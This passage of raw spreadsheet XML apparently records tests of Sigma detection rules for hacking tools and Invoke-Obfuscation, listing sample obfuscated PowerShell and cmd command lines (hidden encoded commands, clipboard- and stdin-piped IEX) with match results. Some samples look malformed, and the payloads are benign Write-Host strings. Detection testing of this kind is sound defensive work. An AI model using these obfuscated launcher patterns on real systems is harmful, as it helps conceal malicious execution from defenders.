      <c r="E1799" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1799" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1799" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1799" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1799" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1800" ht="15.75" customHeight="1" s="42">
      <c r="A1800" s="43" t="n"/>
      <c r="B1800" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1800" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1800" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1800" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1800" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1800" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1800" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1801" ht="15.75" customHeight="1" s="42">
      <c r="A1801" s="43" t="n"/>
      <c r="B1801" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1801" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1801" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1801" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1801" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1801" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1801" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1801" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1801" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1802" ht="15.75" customHeight="1" s="42">
      <c r="A1802" s="43" t="n"/>
      <c r="B1802" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C1802" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D1802" s="44" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E1802" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -sta -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1802" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher (c260b6db-48ba-4b4a-a76f-2f67644e99d2); HackTool - Covenant PowerShell Launcher (c260b6db-48ba-4b4a-a76f-2f67644e99d2); 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02" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1802" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1803" ht="15.75" customHeight="1" s="42">
      <c r="A1803" s="43" t="n"/>
      <c r="B1803" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1803" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1803" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1803" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1803" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1803" s="43" t="n"/>
      <c r="J1803" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1803" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1804" ht="15.75" customHeight="1" s="42">
      <c r="A1804" s="43" t="n"/>
      <c r="B1804" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1804" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1804" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1804" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1804" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1804" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1804" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1804" s="43" t="n"/>
      <c r="J1804" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1804" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1805" ht="15.75" customHeight="1" s="42">
      <c r="A1805" s="43" t="n"/>
      <c r="B1805" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1805" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1805" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1805" s="44" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \"iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1805" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1805" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1805" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1805" s="44" t="n"/>
      <c r="J1805" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1805" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1806" ht="15.75" customHeight="1" s="42">
      <c r="A1806" s="43" t="n"/>
      <c r="B1806" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1806" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1806" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1806" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1806" s="44" t="n"/>
      <c r="J1806" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1806" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1807" ht="15.75" customHeight="1" s="42">
      <c r="A1807" s="43" t="n"/>
      <c r="B1807" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1807" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1807" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1807" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1807" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1807" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1807" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1807" s="43" t="n"/>
      <c r="J1807" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1807" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1808" ht="15.75" customHeight="1" s="42">
      <c r="A1808" s="43" t="n"/>
      <c r="B1808" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1808" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1808" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1808" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1808" s="43" t="n"/>
      <c r="J1808" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1808" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1809" ht="15.75" customHeight="1" s="42">
      <c r="A1809" s="43" t="n"/>
      <c r="B1809" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1809" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1809" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1809" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1809" s="43" t="n"/>
      <c r="J1809" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1809" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1810" ht="15.75" customHeight="1" s="42">
      <c r="A1810" s="43" t="n"/>
      <c r="B1810" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1810" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1810" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1810" s="44" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \"$c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1810" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1810" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1810" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1810" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1810" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1811" ht="15.75" customHeight="1" s="42">
      <c r="A1811" s="43" t="n"/>
      <c r="B1811" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1811" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1811" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1811" s="44" t="inlineStr">
        <is>
          <t>cmd -"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1811" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1811" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1811" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1811" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1811" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1812" ht="15.75" customHeight="1" s="42">
      <c r="A1812" s="43" t="n"/>
      <c r="B1812" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1812" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1812" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1812" s="44" t="inlineStr">
        <is>
          <t>cmd /"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1812" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1812" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1812" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1812" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1812" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1813" ht="15.75" customHeight="1" s="42">
      <c r="A1813" s="43" t="n"/>
      <c r="B1813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1813" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1813" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1813" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1813" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1813" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1813" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1813" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1813" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1814" ht="15.75" customHeight="1" s="42">
      <c r="A1814" s="43" t="n"/>
      <c r="B1814" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1814" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1814" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1814" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFilE -COmManD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1814" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1814" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1814" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1814" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1814" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1815" ht="15.75" customHeight="1" s="42">
      <c r="A1815" s="43" t="n"/>
      <c r="B1815" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1815" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1815" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1815" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nopRofilE -CoMmaNd "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1815" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1815" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1815" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1815" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1815" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1816" ht="15.75" customHeight="1" s="42">
      <c r="A1816" s="43" t="n"/>
      <c r="B1816" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1816" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1816" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1816" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfile -CoMMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1816" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1816" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1816" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1816" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1816" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1817" ht="15.75" customHeight="1" s="42">
      <c r="A1817" s="43" t="n"/>
      <c r="B1817" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1817" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1817" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1817" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1817" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1817" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1817" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1817" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1817" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1818" ht="15.75" customHeight="1" s="42">
      <c r="A1818" s="43" t="n"/>
      <c r="B1818" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1818" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1818" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1818" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -COMmanD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1818" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1818" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1818" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1818" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1818" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1819" ht="15.75" customHeight="1" s="42">
      <c r="A1819" s="43" t="n"/>
      <c r="B1819" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1819" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1819" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1819" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1819" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1819" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1819" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1820" ht="15.75" customHeight="1" s="42">
      <c r="A1820" s="43" t="n"/>
      <c r="B1820" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1820" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1820" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1820" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1820" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1820" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1820" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1821" ht="15.75" customHeight="1" s="42">
      <c r="A1821" s="43" t="n"/>
      <c r="B1821" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1821" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1821" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1821" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1821" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1821" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1821" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1822" ht="15.75" customHeight="1" s="42">
      <c r="A1822" s="43" t="n"/>
      <c r="B1822" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1822" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1822" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1822" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1822" s="43" t="n"/>
      <c r="J1822" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1822" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1823" ht="15.75" customHeight="1" s="42">
      <c r="A1823" s="43" t="n"/>
      <c r="B1823" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1823" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1823" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1823" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1823" s="44" t="b">
